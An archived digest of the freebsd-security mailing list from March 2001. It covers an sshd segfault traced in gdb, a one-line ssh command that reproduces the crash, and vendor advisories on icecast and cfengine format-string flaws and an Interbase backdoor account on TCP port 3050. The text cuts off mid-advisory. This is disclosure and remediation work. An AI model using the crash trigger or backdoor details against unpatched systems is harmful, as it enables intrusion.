Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Mar 12 14:34:19 2001 Delivered-To: freebsd-security@freebsd.org Received: from slip-3.slip.net (slip-3.slip.net [207.171.193.17]) by hub.freebsd.org (Postfix) with ESMTP id D281837B729 for ; Mon, 12 Mar 2001 14:34:12 -0800 (PST) (envelope-from cshishid@slip.net) Received: from cshishid by slip-3.slip.net with local (Exim 2.02 #1) id 14cat0-0001d8-00; Mon, 12 Mar 2001 14:33:54 -0800 Subject: Re: Virus Scanning Software for FreeBSD To: mit@mitayai.net (Will Mitayai Keeso Rowe) Date: Mon, 12 Mar 2001 14:33:53 -0800 (PST) Cc: freebsd-security@freebsd.org In-Reply-To: from "Will Mitayai Keeso Rowe" at Mar 12, 2001 04:56:43 PM X-Mailer: ELM [version 2.5 PL2] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-Id: From: Clark Shishido Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > Is anyone aware of any virus scanning solutions for freebsd, particularly > solutions for email? I don;t trust my users not to follow proper email > guidelines, and thus would like to stop email at the server before they get > delivered the message. > I use this procmail filter to protect myself from all kinds of malicious content, not just known trojans or virii. http://www.impsec.org/email-tools/procmail-security.html it'll protect you and your mail from all those *.vbs worms out there and those yet to be discovered. --clark To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Mar 12 14:40: 0 2001 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id A184337B71A for ; Mon, 12 Mar 2001 14:39:56 -0800 (PST) (envelope-from des@ofug.org) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id XAA43640; Mon, 12 Mar 2001 23:39:54 +0100 (CET) (envelope-from des@ofug.org) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: Spades Cc: freebsd-security@FreeBSD.ORG Subject: Re: rebooting error References: <3.0.32.20010312181407.01724af8@smtp.magix.com.sg> From: Dag-Erling Smorgrav Date: 12 Mar 2001 23:39:54 +0100 In-Reply-To: Spades's message of "Mon, 12 Mar 2001 18:14:08 +0800" Message-ID: Lines: 11 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.4 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Spades writes: > What kinda error gives this? Please show me the output of: 1) uname -a 2) nm $(sysctl -n kern.bootfile) | grep \^c0309 | sort DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Mar 12 14:48:33 2001 Delivered-To: freebsd-security@freebsd.org Received: from ldc.ro (ldc-gw.pub.ro [192.129.3.227]) by hub.freebsd.org (Postfix) with SMTP id 94D3537B719 for ; Mon, 12 Mar 2001 14:48:16 -0800 (PST) (envelope-from razor@ldc.ro) Received: (qmail 78324 invoked by uid 666); 12 Mar 2001 22:48:13 -0000 Date: Tue, 13 Mar 2001 00:48:13 +0200 From: Alex Popa To: freebsd-security@freebsd.org Cc: freebsd-stable@freebsd.org Subject: 4.3-BETA, sshd.core found in root directory. Message-ID: <20010313004813.A78221@ldc.ro> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I am not really sure what this means (could mean a lot of things, including bad memory on my machine), but here are the facts: The system was cvsupped and compiled on March 10th. $ uname -a FreeBSD ns.ldc.ro 4.3-BETA FreeBSD 4.3-BETA #0: Sat Mar 10 15:16:38 EET 2001 root@ns.ldc.ro:/usr/src/sys/compile/NS i386 $ ls -l /sshd.core -rw------- 1 root wheel 507904 Mar 12 16:40 /sshd.core $ ls -l /usr/sbin/sshd -r-xr-xr-x 1 root wheel 196532 Mar 10 16:07 /usr/sbin/sshd # gdb /usr/sbin/sshd /sshd.core GNU gdb 4.18 Copyright 1998 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-unknown-freebsd"... (no debugging symbols found)... Core was generated by `sshd'. Program terminated with signal 11, Segmentation fault. Reading symbols from /usr/lib/libopie.so.2...(no debugging symbols found)... done. Reading symbols from /usr/lib/libmd.so.2...(no debugging symbols found)...done. Reading symbols from /usr/lib/libcrypt.so.2...(no debugging symbols found)... done. Reading symbols from /usr/lib/libcrypto.so.2...(no debugging symbols found)... done. Reading symbols from /usr/lib/libutil.so.3...(no debugging symbols found)... done. Reading symbols from /usr/lib/libz.so.2...(no debugging symbols found)...done. Reading symbols from /usr/lib/libwrap.so.3...(no debugging symbols found)... done. Reading symbols from /usr/lib/libpam.so.1...(no debugging symbols found)... done. ---Type to continue, or q to quit--- Reading symbols from /usr/lib/libc.so.4...(no debugging symbols found)...done. Reading symbols from /usr/libexec/ld-elf.so.1...(no debugging symbols found)... done. #0 0x281741c8 in login_getpwclass () from /usr/lib/libutil.so.3 (gdb) bt #0 0x281741c8 in login_getpwclass () from /usr/lib/libutil.so.3 #1 0x80532e8 in getsockname () #2 0x805a9ef in getsockname () #3 0x8052fd0 in getsockname () #4 0x804d81d in getsockname () #5 0x804be95 in getsockname () (gdb) $ ident /usr/sbin/sshd /usr/sbin/sshd: $OpenBSD: sshd.c,v 1.132 2000/10/13 18:34:46 markus Exp $ $FreeBSD: src/crypto/openssh/sshd.c,v 1.6.2.7 2001/03/04 15:13:08 markm Exp $ $OpenBSD: auth-rhosts.c,v 1.16 2000/10/03 18:03:03 markus Exp $ $OpenBSD: auth-passwd.c,v 1.18 2000/10/03 18:03:03 markus Exp $ $FreeBSD: src/crypto/openssh/auth-passwd.c,v 1.2.2.4 2001/03/04 15:13:08 markm Exp $ $OpenBSD: auth-rsa.c,v 1.32 2000/10/14 12:19:45 markus Exp $ $FreeBSD: src/crypto/openssh/auth-rsa.c,v 1.2.2.3 2001/01/12 04:25:55 green Exp $ $OpenBSD: auth-rh-rsa.c,v 1.17 2000/10/03 18:03:03 markus Exp $ $FreeBSD: src/crypto/openssh/auth-rh-rsa.c,v 1.1.1.1.2.3 2001/01/12 04:25:55 green Exp $ $OpenBSD: pty.c,v 1.16 2000/09/07 21:13:37 markus Exp $ $FreeBSD: src/crypto/openssh/pty.c,v 1.2.2.2 2000/10/28 23:00:49 kris Exp $ $OpenBSD: log-server.c,v 1.17 2000/09/12 20:53:10 markus Exp $ $OpenBSD: login.c,v 1.15 2000/09/07 20:27:52 deraadt Exp $ $FreeBSD: src/crypto/openssh/login.c,v 1.3.2.2 2000/10/28 23:00:48 kris Exp $ $OpenBSD: servconf.c,v 1.53 2000/10/14 12:12:09 markus Exp $ $FreeBSD: src/crypto/openssh/servconf.c,v 1.3.2.10 2001/03/04 15:13:08 markm Exp $ $OpenBSD: serverloop.c,v 1.34 2000/10/27 07:32:18 markus Exp $ $OpenBSD: auth.c,v 1.11 2000/10/11 20:27:23 markus Exp $ $FreeBSD: src/crypto/openssh/auth.c,v 1.3.2.3 2001/01/12 04:25:55 green Exp $ $OpenBSD: auth1.c,v 1.6 2000/10/11 20:27:23 markus Exp $ $FreeBSD: src/crypto/openssh/auth1.c,v 1.3.2.5 2001/03/04 15:13:08 markm Exp $ $OpenBSD: auth2.c,v 1.20 2000/10/14 12:16:56 markus Exp $ $FreeBSD: src/crypto/openssh/auth2.c,v 1.2.2.5 2001/03/04 15:13:08 markm Exp $ $OpenBSD: auth-options.c,v 1.5 2000/10/09 21:32:34 markus Exp $ $OpenBSD: session.c,v 1.42 2000/10/27 07:32:18 markus Exp $ $FreeBSD: src/crypto/openssh/session.c,v 1.4.2.7 2001/02/04 20:21:06 green Exp $ $OpenBSD: dh.c,v 1.2 2000/10/11 20:11:35 markus Exp $ $FreeBSD: src/crypto/openssh/auth-pam.c,v 1.2.2.1 2001/01/12 04:25:54 green Exp $ $FreeBSD: src/crypto/openssh/auth2-skey.c,v 1.2.2.1 2001/01/12 04:25:55 green Exp $ $OpenBSD: auth2-skey.c,v 1.1 2000/10/11 20:14:38 markus Exp $ $OpenBSD: auth-skey.c,v 1.9 2000/10/19 16:41:13 deraadt Exp $ $FreeBSD: src/crypto/openssh/auth-skey.c,v 1.1.1.1.2.4 2001/01/12 04:25:55 green Exp $ $OpenBSD: kex.c,v 1.12 2000/10/11 20:27:23 markus Exp $ $OpenBSD: dispatch.c,v 1.5 2000/09/21 11:25:34 markus Exp $ $OpenBSD: ttymodes.c,v 1.8 2000/09/07 20:27:55 deraadt Exp $ $OpenBSD: tildexpand.c,v 1.8 2000/09/07 20:27:55 deraadt Exp $ $OpenBSD: rsa.c,v 1.16 2000/09/07 20:27:53 deraadt Exp $ $FreeBSD: src/crypto/openssh/rsa.c,v 1.1.1.1.2.6 2001/02/12 06:45:42 kris Exp $ $OpenBSD: readpass.c,v 1.12 2000/10/11 20:14:39 markus Exp $ $OpenBSD: mpaux.c,v 1.14 2000/09/07 20:27:52 deraadt Exp $ $FreeBSD: src/crypto/openssh/mpaux.c,v 1.2.2.2 2000/10/28 23:00:48 kris Exp $ $OpenBSD: hostfile.c,v 1.20 2000/09/07 20:27:51 deraadt Exp $ $FreeBSD: src/crypto/openssh/hostfile.c,v 1.1.1.1.2.2 2000/10/28 23:00:48 kris Exp $ $OpenBSD: authfile.c,v 1.20 2000/10/11 20:27:23 markus Exp $ $FreeBSD: src/crypto/openssh/authfile.c,v 1.2.2.3 2001/01/12 04:25:55 green Exp $ $OpenBSD: cli.c,v 1.2 2000/10/16 09:38:44 djm Exp $ $OpenBSD: match.c,v 1.9 2000/09/07 20:27:52 deraadt Exp $ $OpenBSD: dsa.c,v 1.11 2000/09/07 20:27:51 deraadt Exp $ $OpenBSD: xmalloc.c,v 1.8 2000/09/07 20:27:55 deraadt Exp $ $OpenBSD: packet.c,v 1.38 2000/10/12 14:21:12 markus Exp $ $OpenBSD: hmac.c,v 1.4 2000/09/07 20:27:51 deraadt Exp $ $OpenBSD: crc32.c,v 1.7 2000/09/07 20:27:51 deraadt Exp $ $OpenBSD: compress.c,v 1.9 2000/09/07 20:27:50 deraadt Exp $ $OpenBSD: cipher.c,v 1.37 2000/10/23 19:31:54 markus Exp $ $FreeBSD: src/crypto/openssh/cipher.c,v 1.2.2.3 2001/01/12 04:25:56 green Exp $ $OpenBSD: nchan.c,v 1.19 2000/09/07 20:27:52 deraadt Exp $ $OpenBSD: channels.c,v 1.72 2000/10/27 07:48:22 markus Exp $ $OpenBSD: canohost.c,v 1.16 2000/10/21 17:04:22 markus Exp $ $FreeBSD: src/crypto/openssh/canohost.c,v 1.1.1.1.2.4 2001/01/12 04:25:56 green Exp $ $OpenBSD: authfd.c,v 1.29 2000/10/09 21:51:00 markus Exp $ $FreeBSD: src/crypto/openssh/authfd.c,v 1.2.2.4 2001/01/12 04:25:55 green Exp $ $OpenBSD: util.c,v 1.6 2000/10/27 07:32:19 markus Exp $ $OpenBSD: key.c,v 1.11 2000/09/07 20:27:51 deraadt Exp $ $FreeBSD: src/crypto/openssh/key.c,v 1.4.2.2 2000/10/28 23:00:48 kris Exp $ $OpenBSD: atomicio.c,v 1.7 2000/10/18 18:04:02 markus Exp $ $OpenBSD: uidswap.c,v 1.9 2000/09/07 20:27:55 deraadt Exp $ $FreeBSD: src/crypto/openssh/compat.c,v 1.1.1.1.2.3 2001/01/12 04:25:56 green Exp $ $OpenBSD: compat.c,v 1.27 2000/10/31 09:31:58 markus Exp $ $OpenBSD: bufaux.c,v 1.13 2000/09/07 20:27:50 deraadt Exp $ $FreeBSD: src/crypto/openssh/bufaux.c,v 1.2.2.2 2000/10/28 23:00:47 kris Exp $ $OpenBSD: uuencode.c,v 1.7 2000/09/07 20:27:55 deraadt Exp $ $OpenBSD: buffer.c,v 1.8 2000/09/07 20:27:50 deraadt Exp $ $OpenBSD: log.c,v 1.11 2000/09/30 16:27:43 markus Exp $ /var/log/all.log has this on the incident: Mar 12 16:40:01 ns sshd[76406]: input_userauth_request: illegal user hodo Mar 12 16:40:03 ns /kernel: pid 76406 (sshd), uid 0: exited on signal 11 (core dumped) Mar 12 16:40:03 ns /kernel: Mar 12 16:40:03 ns /kernel: pid 76406 (sshd), uid 0: exited on signal 11 (core dumped) From the output of "strings /sshd.core" I can see the server was doing some pretty normal activity, like rejecting a user I know, that had an account on another machine, but not this one. If there is more information needed, I will try to provide it. Thank you for listening and not panicking. ------------+------------------------------------------ Alex Popa, | "Artificial Intelligence is razor@ldc.ro| no match for Natural Stupidity" ------------+------------------------------------------ "It took the computing power of three C-64s to fly to the Moon. It takes a 486 to run Windows 95. Something is wrong here." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Mar 12 14:58:13 2001 Delivered-To: freebsd-security@freebsd.org Received: from odin.ac.hmc.edu (Odin.AC.HMC.Edu [134.173.32.75]) by hub.freebsd.org (Postfix) with ESMTP id 2234C37B718 for ; Mon, 12 Mar 2001 14:58:09 -0800 (PST) (envelope-from brdavis@odin.ac.hmc.edu) Received: (from brdavis@localhost) by odin.ac.hmc.edu (8.11.0/8.11.0) id f2CMvsO01383; Mon, 12 Mar 2001 14:57:54 -0800 Date: Mon, 12 Mar 2001 14:57:54 -0800 From: Brooks Davis To: Alex Popa Cc: security@freebsd.org Subject: Re: 4.3-BETA, sshd.core found in root directory. Message-ID: <20010312145754.A489@Odin.AC.HMC.Edu> References: <20010313004813.A78221@ldc.ro> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="DocE+STaALJfprDB" Content-Disposition: inline User-Agent: Mutt/1.2i In-Reply-To: <20010313004813.A78221@ldc.ro>; from razor@ldc.ro on Tue, Mar 13, 2001 at 12:48:13AM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --DocE+STaALJfprDB Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Tue, Mar 13, 2001 at 12:48:13AM +0200, Alex Popa wrote: > I am not really sure what this means (could mean a lot of things,=20 > including bad memory on my machine), but here are the facts: This reminds me of something I noticed during the last discussion of ssh I got involved in and compleatly forgot about. If you create an account with a bad shell (say, /bin/false) and run the following command you get an immediate sshd core dump: ssh -t xxx@localhost /bin/sh Attempting to run gdb on the core appears to show that I'm in: #0 0x4817c3b7 in login_getpwclass () from /usr/lib/libutil.so.3 but the binary is stripped so I don't know and my /usr/obj is out of sync with my world at the moment so I figure running gdb against the unstripped binary is not productive. -- Brooks --=20 Any statement of the form "X is the one, true Y" is FALSE. PGP fingerprint 655D 519C 26A7 82E7 2529 9BF0 5D8E 8BE9 F238 1AD4 --DocE+STaALJfprDB Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE6rVRxXY6L6fI4GtQRAg+kAJ4vCmuI9LwU1SYhc+P4giz+WKJhQQCguZSX NyC1bmupNaEBEMJH1y4nmB8= =akX/ -----END PGP SIGNATURE----- --DocE+STaALJfprDB-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Mar 12 15: 2: 9 2001 Delivered-To: freebsd-security@freebsd.org Received: from cage.simianscience.com (cage.simianscience.com [64.7.134.1]) by hub.freebsd.org (Postfix) with ESMTP id 780A437B719; Mon, 12 Mar 2001 15:02:03 -0800 (PST) (envelope-from mike@sentex.net) Received: from chimp (fcage [192.168.0.2]) by cage.simianscience.com (8.11.2/8.11.2) with ESMTP id f2CN1Yg55899; Mon, 12 Mar 2001 18:01:40 -0500 (EST) (envelope-from mike@sentex.net) Message-Id: <4.2.2.20010312180009.02c135a8@marble.sentex.net> X-Sender: mdtancsa@marble.sentex.net X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.2 Date: Mon, 12 Mar 2001 18:01:33 -0500 To: Alex Popa , freebsd-security@FreeBSD.ORG From: Mike Tancsa Subject: Re: 4.3-BETA, sshd.core found in root directory. Cc: freebsd-stable@FreeBSD.ORG In-Reply-To: <20010313004813.A78221@ldc.ro> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 12:48 AM 3/13/2001 +0200, Alex Popa wrote: >I am not really sure what this means (could mean a lot of things, >including bad memory on my machine), but here are the facts: > >The system was cvsupped and compiled on March 10th. There is an open PR about this. http://www.freebsd.org/cgi/query-pr.cgi?pr=25722 I wonder if its exploitable ? ---Mike -------------------------------------------------------------------- Mike Tancsa, tel +1 519 651 3400 Network Administration, mike@sentex.net Sentex Communications www.sentex.net Cambridge, Ontario Canada www.sentex.net/mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Mar 12 15:22:20 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-63-207-60-59.dsl.lsan03.pacbell.net [63.207.60.59]) by hub.freebsd.org (Postfix) with ESMTP id 520E037B71A for ; Mon, 12 Mar 2001 15:22:16 -0800 (PST) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 0A29266B6C; Mon, 12 Mar 2001 15:22:15 -0800 (PST) Date: Mon, 12 Mar 2001 15:22:15 -0800 From: Kris Kennaway To: Brooks Davis Cc: Alex Popa , security@FreeBSD.ORG Subject: Re: 4.3-BETA, sshd.core found in root directory. Message-ID: <20010312152215.A94640@mollari.cthul.hu> References: <20010313004813.A78221@ldc.ro> <20010312145754.A489@Odin.AC.HMC.Edu> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="Nq2Wo0NMKNjxTN9z" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010312145754.A489@Odin.AC.HMC.Edu>; from brooks@one-eyed-alien.net on Mon, Mar 12, 2001 at 02:57:54PM -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --Nq2Wo0NMKNjxTN9z Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Mon, Mar 12, 2001 at 02:57:54PM -0800, Brooks Davis wrote: > On Tue, Mar 13, 2001 at 12:48:13AM +0200, Alex Popa wrote: > > I am not really sure what this means (could mean a lot of things,=20 > > including bad memory on my machine), but here are the facts: >=20 > This reminds me of something I noticed during the last discussion of > ssh I got involved in and compleatly forgot about. If you create an > account with a bad shell (say, /bin/false) and run the following command > you get an immediate sshd core dump: >=20 > ssh -t xxx@localhost /bin/sh >=20 > Attempting to run gdb on the core appears to show that I'm in: >=20 > #0 0x4817c3b7 in login_getpwclass () from /usr/lib/libutil.so.3 >=20 > but the binary is stripped so I don't know and my /usr/obj is out of > sync with my world at the moment so I figure running gdb against the > unstripped binary is not productive. There's a PR open about this and Brian is looking into it - indications are it's a simple bug and not a security problem, denial of service or otherwise. Kris --Nq2Wo0NMKNjxTN9z Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6rVonWry0BWjoQKURAgsqAJ9O7Nv5bFkBfhRjEo8OgB34JWgFGwCfULJ8 i6pGoR04IEwGi8EtywY58XU= =7bZh -----END PGP SIGNATURE----- --Nq2Wo0NMKNjxTN9z-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Mar 12 15:31:48 2001 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id A965B37B71A; Mon, 12 Mar 2001 15:31:37 -0800 (PST) (envelope-from security-advisories@FreeBSD.org) Received: (from kris@localhost) by freefall.freebsd.org (8.11.1/8.11.1) id f2CNVb526130; Mon, 12 Mar 2001 15:31:37 -0800 (PST) (envelope-from security-advisories@FreeBSD.org) Date: Mon, 12 Mar 2001 15:31:37 -0800 (PST) Message-Id: <200103122331.f2CNVb526130@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: kris set sender to security-advisories@FreeBSD.org using -f From: FreeBSD Security Advisories To: FreeBSD Security Advisories Subject: FreeBSD Ports Security Advisory FreeBSD-SA-01:23.icecast Reply-To: security-advisories@FreeBSD.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-01:23 Security Advisory FreeBSD, Inc. Topic: icecast port contains remote vulnerability Category: ports Module: icecast Announced: 2001-03-12 Credits: |CyRaX| Affects: Ports collection prior to the correction date. Corrected: 2001-03-10 Vendor status: Unresponsive FreeBSD only: NO I. Background icecast is a server for streaming MP3 audio. II. Problem Description The icecast software, versions prior to 1.3.7_1, contains multiple format string vulnerabilities, which allow a remote attacker to execute arbitrary code as the user running icecast, usually the root user. There are a number of other potential abuses of format strings which may or may not pose security risks, but have not currently been audited. The icecast port is not installed by default, nor is it "part of FreeBSD" as such: it is part of the FreeBSD ports collection, which contains nearly 4700 third-party applications in a ready-to-install format. The ports collections shipped with FreeBSD 3.5.1 and 4.2 contain this problem since it was discovered after the releases. FreeBSD makes no claim about the security of these third-party applications, although an effort is underway to provide a security audit of the most security-critical ports. III. Impact Arbitrary remote users can execute arbitrary code on the local system as the user running icecast, usually the root user. If you have not chosen to install the icecast port/package, then your system is not vulnerable to this problem. IV. Workaround Deinstall the icecast port/package, if you have installed it. V. Solution Consider running the icecast software as a non-privileged user to minimize the impact of further security vulnerabilities in this software. To upgrade icecast, choose one of the following options: 1) Upgrade your entire ports collection and rebuild the icecast port. 2) Deinstall the old package and install a new package dated after the correction date, obtained from: [i386] ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/audio/icecast-1.3.7_1.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/audio/icecast-1.3.7_1.tgz NOTE: It may be several days before updated packages are available [alpha] ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/audio/icecast-1.3.7_1.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/audio/icecast-1.3.7_1.tgz 3) download a new port skeleton for the icecast port from: http://www.freebsd.org/ports/ and use it to rebuild the port. 4) Use the portcheckout utility to automate option (3) above. The portcheckout port is available in /usr/ports/devel/portcheckout or the package can be obtained from: ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/devel/portcheckout-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/devel/portcheckout-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/devel/portcheckout-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/devel/portcheckout-2.0.tgz -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iQCVAwUBOq1b9lUuHi5z0oilAQF0VQQAgjsvLSPtZ1pu6OtkGxuMJhCmmeCvFJvL 4szsF1csrFrXhaH7z1VjJP8r/Q2NBzWcS3qujkhGRObsGGyvAJKk7QVrqnjXV3gD rgLnphjNlKt0VuXafxXwTT8YTxoCbzOHy23aa0KaRWoCAVcVi4AAZs4XHEUgU+Ov lWOyEgxUBEk= =WM3Y -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Mar 12 15:35:11 2001 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id A503837B718; Mon, 12 Mar 2001 15:34:53 -0800 (PST) (envelope-from security-advisories@FreeBSD.org) Received: (from kris@localhost) by freefall.freebsd.org (8.11.1/8.11.1) id f2CNYrJ26352; Mon, 12 Mar 2001 15:34:53 -0800 (PST) (envelope-from security-advisories@FreeBSD.org) Date: Mon, 12 Mar 2001 15:34:53 -0800 (PST) Message-Id: <200103122334.f2CNYrJ26352@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: kris set sender to security-advisories@FreeBSD.org using -f From: FreeBSD Security Advisories To: FreeBSD Security Advisories Subject: FreeBSD Ports Security Advisory FreeBSD-SA-01:26.interbase Reply-To: security-advisories@FreeBSD.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-01:26 Security Advisory FreeBSD, Inc. Topic: interbase contains remote backdoor Category: ports Module: interbase Announced: 2001-03-12 Credits: Firebird project Affects: Ports collection prior to the correction date. Corrected: See below. Vendor status: No update released FreeBSD only: NO I. Background Interbase is a SQL database server from Borland. II. Problem Description The interbase software contains a remote backdoor account, which was apparently introduced by the vendor in 1992. The interbase source code has recently been released and is the basis for a derivative project called firebird, who are credited with discovering the vulnerability. The backdoor account has full read and write access to databases stored on the server, and also gives the ability to write to arbitrary files on the server as the user running the interbase server (usually user root). Remote attackers may connect to the database on TCP port 3050. The interbase port is not installed by default, nor is it "part of FreeBSD" as such: it is part of the FreeBSD ports collection, which contains nearly 4700 third-party applications in a ready-to-install format. The ports collections shipped with FreeBSD 3.5.1 and 4.2 contain this problem since it was discovered after the releases. FreeBSD makes no claim about the security of these third-party applications, although an effort is underway to provide a security audit of the most security-critical ports. III. Impact Remote users who can connect to the interbase database server can obtain full access to all databases using a backdoor account built into the server itself. This account cannot be disabled. If you have not chosen to install the interbase port/package, then your system is not vulnerable to this problem. IV. Workaround 1) Deinstall the interbase port/package, if you have installed it. 2) Use packet filters on your perimeter firewalls, or ipfw(8)/ipf(8) on the interbase server to prevent connections from untrusted systems to TCP port 3050 on the interbase server. Note that local users, or arbitrary users on systems permitted to connect to the TCP port can still access the backdoor account. 3) Migrate to the firebird database, which is an open-source derivative of the interbase software which does not contain the backdoor account. V. Solution The FreeBSD port of interbase is not provided by Borland -- it is provided in binary form from Rios Corporation -- and there does not appear to be a patch available for the security vulnerability. Therefore there is currently no complete solution to this security vulnerability; see the previous section for possible workarounds. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iQCVAwUBOq1c21UuHi5z0oilAQEfhgP/aoWhV5eBmmKkYcpVxRhu+FkkOYJvIwih RIsCmTKISP5f0smt37Qw4B0o5F2EmAUVncYFNGK39Co+Pxr9eyRx0PD4HvX8JnZ3 7QtqRE4Oh2LwX0xpd9tpUpT1yxdGX9u+TSB+9MdB5hIyEsnRjwuMwZn1vUOBB8uk whVMpvQLc/w= =C9Nl -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Mar 12 15:38: 8 2001 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id A92F337B71A; Mon, 12 Mar 2001 15:37:52 -0800 (PST) (envelope-from security-advisories@FreeBSD.org) Received: (from kris@localhost) by freefall.freebsd.org (8.11.1/8.11.1) id f2CNbqc26863; Mon, 12 Mar 2001 15:37:52 -0800 (PST) (envelope-from security-advisories@FreeBSD.org) Date: Mon, 12 Mar 2001 15:37:52 -0800 (PST) Message-Id: <200103122337.f2CNbqc26863@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: kris set sender to security-advisories@FreeBSD.org using -f From: FreeBSD Security Advisories To: FreeBSD Security Advisories Subject: FreeBSD Ports Security Advisory FreeBSD-SA-01:27.cfengine Reply-To: security-advisories@FreeBSD.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-01:27 Security Advisory FreeBSD, Inc. Topic: cfengine port contains remote root vulnerability Category: ports Module: cfengine Announced: 2001-03-12 Credits: Pekka Savola Affects: Ports collection prior to the correction date. Corrected: 2001-01-21 Vendor status: Updated version released FreeBSD only: NO I. Background cfengine is a system for automating the configuration and maintenance of large networks. II. Problem Description The cfengine port, versions prior to 1.6.1, contained several format string vulnerabilities which allow a remote attacker to execute arbitrary code on the local system as the user running cfengine, usually user root. The cfengine port is not installed by default, nor is it "part of FreeBSD" as such: it is part of the FreeBSD ports collection, which contains nearly 4700 third-party applications in a ready-to-install format. The ports collections shipped with FreeBSD 3.5.1 and 4.2 contain this problem since it was discovered after the releases. FreeBSD makes no claim about the security of these third-party applications, although an effort is underway to provide a security audit of the most security-critical ports. III. Impact Arbitrary remote users can execute code on the local system as the user running cfengine, usually user root. If you have not chosen to install the cfengine port/package, then your system is not vulnerable to this problem. IV. Workaround One of the following: 1) Deinstall the cfengine port/package, if you have installed it. 2) Implement access controls on connections to the cfengine server, either at the application level using the cfengine 